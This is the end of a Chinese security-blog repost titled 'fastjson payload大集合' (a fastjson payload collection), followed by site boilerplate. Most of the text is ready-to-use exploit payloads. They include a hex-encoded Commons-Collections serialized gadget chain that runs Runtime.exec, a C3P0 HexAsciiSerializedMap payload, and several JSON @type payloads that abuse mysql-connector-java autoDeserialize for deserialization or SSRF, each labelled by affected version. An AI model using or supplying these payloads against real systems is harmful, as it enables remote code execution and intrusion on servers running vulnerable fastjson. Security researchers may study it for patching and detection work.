2D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000047372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65707400096765744D6574686F64757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001C7371007E00137571007E0018000000027070740006696E766F6B657571007E001C00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E00137571007E00180000000174000463616C63740004657865637571007E001C0000000171007E001F737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878;"}

fastjson<1.2.48,C3P0,commons-collections-3.2.1

{    "a": {        "@type": "java.lang.Class",         "val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"    },     "b": {        "@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",         "userOverridesAsString": "HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000047372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65707400096765744D6574686F64757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001C7371007E00137571007E0018000000027070740006696E766F6B657571007E001C00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E00137571007E00180000000174000463616C63740004657865637571007E001C0000000171007E001F737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878;"    }}

fastjson<=1.2.68,mysql-connector-java-5.0.2-5.1.5,仅SSRF

{    "@type": "java.lang.AutoCloseable",    "@type": "com.mysql.jdbc.ReplicationConnection",    "masterProperties": {        "HOST": "127.0.0.1",        "user": "yso_CommonsCollections4_calc",        "password": "pass",        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",        "autoDeserialize": "true"    },    "slaveProperties": {        "HOST": "127.0.0.1",        "user": "yso_CommonsCollections4_calc",        "password": "pass",        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",        "autoDeserialize": "true"    }}

fastjson<=1.2.68,mysql-connector-java-5.1.1-5.1.49可SSRF 5.1.11至5.1.48可反序列化 

自寻us-21-Xing-How-I-Use-A-JSON-Deserialization.pdf

{    "@type": "java.lang.AutoCloseable",    "@type": "com.mysql.jdbc.JDBC4Connection",    "hostToConnectTo": "127.0.0.1",    "portToConnectTo": 3306,    "info": {        "user": "yso_CommonsCollections4_calc",        "password": "pass",        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",        "autoDeserialize": "true",        "NUM_HOSTS": "1"    },    "databaseToConnectTo": "dbname",    "url": ""}

fastjson<=1.2.68,mysql-connector-java-6.0.2-6.0.3可反序列化

自寻us-21-Xing-How-I-Use-A-JSON-Deserialization.pdf

{    "@type": "java.lang.AutoCloseable",    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",    "proxy": {        "connectionString": {            "url": "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc"        }    }}

fastjson<=1.2.68,mysql-connector-java-8.0.19可反序列化,>8.0.19可SSRF

自寻us-21-Xing-How-I-Use-A-JSON-Deserialization.pdf

{    "@type": "java.lang.AutoCloseable",    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",    "proxy": {        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",        "connectionUrl": {            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",            "masters": [{                "host": ""            }],            "slaves": [],            "properties": {                "host": "127.0.0.1",                "user": "yso_CommonsCollections4_calc",                "dbname": "dbname",                "password": "pass",                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",                "autoDeserialize": "true"            }        }    }}


https://github.com/kezibei/fastjson_payload

原文始发于微信公众号(珂技知识分享):fastjson payload大集合

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日04:03:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  fastjson payload大集合 http://cn-sec.com/archives/718722.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: